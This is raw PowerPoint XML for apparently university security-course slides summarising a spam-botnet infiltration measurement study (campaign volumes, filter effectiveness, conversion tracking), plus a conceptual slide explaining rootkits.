                <a:gd name="connsiteX47" fmla="*/ 302150 w 465151"/>
                <a:gd name="connsiteY47" fmla="*/ 35781 h 373712"/>
                <a:gd name="connsiteX48" fmla="*/ 278296 w 465151"/>
                <a:gd name="connsiteY48" fmla="*/ 27830 h 373712"/>
                <a:gd name="connsiteX49" fmla="*/ 254442 w 465151"/>
                <a:gd name="connsiteY49" fmla="*/ 19879 h 373712"/>
                <a:gd name="connsiteX50" fmla="*/ 242515 w 465151"/>
                <a:gd name="connsiteY50" fmla="*/ 15903 h 373712"/>
                <a:gd name="connsiteX51" fmla="*/ 230588 w 465151"/>
                <a:gd name="connsiteY51" fmla="*/ 11927 h 373712"/>
                <a:gd name="connsiteX52" fmla="*/ 202758 w 465151"/>
                <a:gd name="connsiteY52" fmla="*/ 0 h 373712"/>
                <a:gd name="connsiteX53" fmla="*/ 75538 w 465151"/>
                <a:gd name="connsiteY53" fmla="*/ 3976 h 373712"/>
                <a:gd name="connsiteX54" fmla="*/ 59635 w 465151"/>
                <a:gd name="connsiteY54" fmla="*/ 7952 h 373712"/>
                <a:gd name="connsiteX55" fmla="*/ 19878 w 465151"/>
                <a:gd name="connsiteY55" fmla="*/ 11927 h 373712"/>
                <a:gd name="connsiteX56" fmla="*/ 0 w 465151"/>
                <a:gd name="connsiteY56" fmla="*/ 35781 h 37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5151" h="373712">
                  <a:moveTo>
                    <a:pt x="0" y="35781"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="35781"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2650" y="47708"/>
                    <a:pt x="4988" y="59709"/>
                    <a:pt x="7951" y="71562"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8967" y="75628"/>
                    <a:pt x="10911" y="79423"/>
                    <a:pt x="11927" y="83489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20122" y="116268"/>
                    <a:pt x="11719" y="90712"/>
                    <a:pt x="19878" y="119270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21029" y="123300"/>
                    <a:pt x="21980" y="127449"/>
                    <a:pt x="23854" y="131197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25991" y="135471"/>
                    <a:pt x="29864" y="138758"/>
                    <a:pt x="31805" y="143124"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38102" y="157292"/>
                    <a:pt x="36913" y="168110"/>
                    <a:pt x="47708" y="178905"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51087" y="182284"/>
                    <a:pt x="55659" y="184206"/>
                    <a:pt x="59635" y="186856"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62285" y="190832"/>
                    <a:pt x="64476" y="195155"/>
                    <a:pt x="67586" y="198783"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72465" y="204475"/>
                    <a:pt x="83489" y="214686"/>
                    <a:pt x="83489" y="214686"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84814" y="218662"/>
                    <a:pt x="85591" y="222865"/>
                    <a:pt x="87465" y="226613"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90908" y="233498"/>
                    <a:pt x="97206" y="241562"/>
                    <a:pt x="103367" y="246491"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107098" y="249476"/>
                    <a:pt x="111318" y="251792"/>
                    <a:pt x="115294" y="254442"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118907" y="259862"/>
                    <a:pt x="124900" y="270542"/>
                    <a:pt x="131197" y="274320"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134791" y="276476"/>
                    <a:pt x="139376" y="276422"/>
                    <a:pt x="143124" y="278296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147398" y="280433"/>
                    <a:pt x="151320" y="283262"/>
                    <a:pt x="155051" y="286247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157978" y="288589"/>
                    <a:pt x="159788" y="292270"/>
                    <a:pt x="163002" y="294199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166595" y="296355"/>
                    <a:pt x="170953" y="296849"/>
                    <a:pt x="174929" y="298174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177579" y="300825"/>
                    <a:pt x="179527" y="304450"/>
                    <a:pt x="182880" y="306126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190377" y="309874"/>
                    <a:pt x="198783" y="311427"/>
                    <a:pt x="206734" y="314077"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210710" y="315402"/>
                    <a:pt x="215174" y="315728"/>
                    <a:pt x="218661" y="318053"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="222637" y="320703"/>
                    <a:pt x="226222" y="324063"/>
                    <a:pt x="230588" y="326004"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238247" y="329408"/>
                    <a:pt x="246491" y="331305"/>
                    <a:pt x="254442" y="333955"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="266369" y="337931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278296" y="341906"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="282272" y="344557"/>
                    <a:pt x="285857" y="347917"/>
                    <a:pt x="290223" y="349858"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="297882" y="353262"/>
                    <a:pt x="306126" y="355159"/>
                    <a:pt x="314077" y="357809"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="322988" y="360779"/>
                    <a:pt x="332629" y="364333"/>
                    <a:pt x="341906" y="365760"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="353767" y="367585"/>
                    <a:pt x="365792" y="368150"/>
                    <a:pt x="377687" y="369736"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="385677" y="370801"/>
                    <a:pt x="393590" y="372387"/>
                    <a:pt x="401541" y="373712"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="421419" y="372387"/>
                    <a:pt x="441848" y="374568"/>
                    <a:pt x="461176" y="369736"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="465242" y="368720"/>
                    <a:pt x="465151" y="362000"/>
                    <a:pt x="465151" y="357809"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="465151" y="348986"/>
                    <a:pt x="463421" y="322544"/>
                    <a:pt x="457200" y="310101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="449796" y="295293"/>
                    <a:pt x="448314" y="299438"/>
                    <a:pt x="437322" y="286247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="423082" y="269159"/>
                    <a:pt x="434359" y="280321"/>
                    <a:pt x="425395" y="262393"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="423258" y="258119"/>
                    <a:pt x="419385" y="254832"/>
                    <a:pt x="417444" y="250466"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="414040" y="242807"/>
                    <a:pt x="412142" y="234564"/>
                    <a:pt x="409492" y="226613"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="401541" y="202759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389614" y="166978"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="388289" y="163002"/>
                    <a:pt x="386654" y="159117"/>
                    <a:pt x="385638" y="155051"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="384313" y="149750"/>
                    <a:pt x="382848" y="144482"/>
                    <a:pt x="381663" y="139148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="379848" y="130981"/>
                    <a:pt x="377974" y="115869"/>
                    <a:pt x="373711" y="107343"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="371574" y="103069"/>
                    <a:pt x="368410" y="99392"/>
                    <a:pt x="365760" y="95416"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="355900" y="65831"/>
                    <a:pt x="371036" y="105318"/>
                    <a:pt x="345882" y="67586"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="343232" y="63610"/>
                    <a:pt x="341310" y="59038"/>
                    <a:pt x="337931" y="55659"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="330224" y="47952"/>
                    <a:pt x="323778" y="46966"/>
                    <a:pt x="314077" y="43733"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310101" y="41082"/>
                    <a:pt x="306516" y="37722"/>
                    <a:pt x="302150" y="35781"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="294491" y="32377"/>
                    <a:pt x="286247" y="30480"/>
                    <a:pt x="278296" y="27830"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="254442" y="19879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242515" y="15903"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="238539" y="14578"/>
                    <a:pt x="234075" y="14252"/>
                    <a:pt x="230588" y="11927"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214114" y="945"/>
                    <a:pt x="223296" y="5135"/>
                    <a:pt x="202758" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160351" y="1325"/>
                    <a:pt x="117900" y="1622"/>
                    <a:pt x="75538" y="3976"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70082" y="4279"/>
                    <a:pt x="65044" y="7179"/>
                    <a:pt x="59635" y="7952"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46450" y="9835"/>
                    <a:pt x="33130" y="10602"/>
                    <a:pt x="19878" y="11927"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2690" y="16224"/>
                    <a:pt x="3313" y="31805"/>
                    <a:pt x="0" y="3578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ular Callout 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8669184" y="210113"/>
            <a:ext cx="2187891" cy="1042813"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 157098"/>
              <a:gd name="adj2" fmla="val 6169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US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tw Cen MT"/>
              </a:rPr>
              <a:t>Researchers infiltrated here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangular Callout 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8669184" y="2119123"/>
            <a:ext cx="2748785" cy="1129403"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 119893"/>
              <a:gd name="adj2" fmla="val 100048"/>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US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tw Cen MT"/>
              </a:rPr>
              <a:t>Researchers injected additional target email addresses </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F69B8368-B4BA-43C8-97DA-97BCCE0A80B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4804012" y="3675797"/>
            <a:ext cx="2338316" cy="618699"/>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3895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on Three Spam Campaigns</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One pharmaceuticals and two self-propagating malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ran fake, harmless websites that look like the real ones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Conversion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>signals</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>For pharma, a click on “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>purchase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>button</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For malware, download and execute a binary that phones home and exits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22945441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4692" y="27658"/>
            <a:ext cx="9440460" cy="6802684"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Up Arrow 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19657347">
            <a:off x="8790255" y="1084919"/>
            <a:ext cx="1181117" cy="1246038"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="381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13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69077" y="2044983"/>
            <a:ext cx="9144000" cy="3427562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Up Arrow 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="14400000">
            <a:off x="8012633" y="3088383"/>
            <a:ext cx="740649" cy="1796199"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="381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83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5411-156E-474C-9336-2B8C9E01AD6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rootkits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{440A6ADF-7937-48E0-8739-5390AE121AA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825624"/>
            <a:ext cx="10515600" cy="4777767"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tool that gives an attacker continued privilege escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typically installed after exploiting the kernel or gaining root privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modifies the OS to make privilege escalation permanent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Emphasis on evasion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rootkit makes itself (and possibly other malware) undetectable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hides processes, files, network sockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In other words: the OS can no longer be trusted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Very challenging to remove</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Erasing the OS and reinstall from scratch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>might</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> work</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphic 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE0E98AE-8673-4CE5-BD99-9B1CB5EF27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90713">
            <a:off x="9641162" y="82131"/>
            <a:ext cx="2295126" cy="2295126"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="165142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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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Campaign Volumes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="3144744"/>
            <a:ext cx="9144000" cy="2113056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36947283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126" y="132347"/>
            <a:ext cx="7543801" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rewritten Spam Emails per Hour</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2500861" y="1027682"/>
            <a:ext cx="7653792" cy="5830318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17283541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Spam Delivery: Top Domains</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4025900" y="1790861"/>
            <a:ext cx="4127500" cy="4800600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40167780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74371" y="87085"/>
            <a:ext cx="7848601" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spam Filter Effectiveness</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1850572" y="4909458"/>
            <a:ext cx="7543801" cy="1393371"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Average: 0.014%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 in 7,142 attempted spams got through</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2006602" y="2709054"/>
            <a:ext cx="8051800" cy="1786744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1850571" y="1654629"/>
            <a:ext cx="8556172" cy="17526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ClrTx/>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>What percentage of spam got through the filters?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18528358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514" y="141514"/>
            <a:ext cx="8860972" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Conversion Tracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="4729331"/>
            <a:ext cx="9144000" cy="2076773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7170" name="Picture 2" descr="D:\Classes\CS 4700\assets\spamalytic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981" y="1532407"/>
            <a:ext cx="6904038" cy="28159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93AB153-737F-431F-A79B-6A9C8E0B52A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2329218" y="1364776"/>
            <a:ext cx="1028281" cy="3029803"/>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54BD7216-4698-4BE0-82DE-0D2B70CFCE9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557415" y="5025310"/>
            <a:ext cx="9110585" cy="30028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14529C54-CE69-443D-83E5-A280CCE33561}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3357499" y="1364776"/>
            <a:ext cx="1320185" cy="3029803"/>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5CDBD78D-46D0-4F84-9696-B2532D8F29AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557415" y="5243674"/>
            <a:ext cx="9110585" cy="30028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5A6C3BE8-8948-475F-8FAE-D12EDD1CFF2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4677685" y="1364776"/>
            <a:ext cx="1418316" cy="3029803"/>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4971FD86-A6E0-41C9-8190-EF27D036A508}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
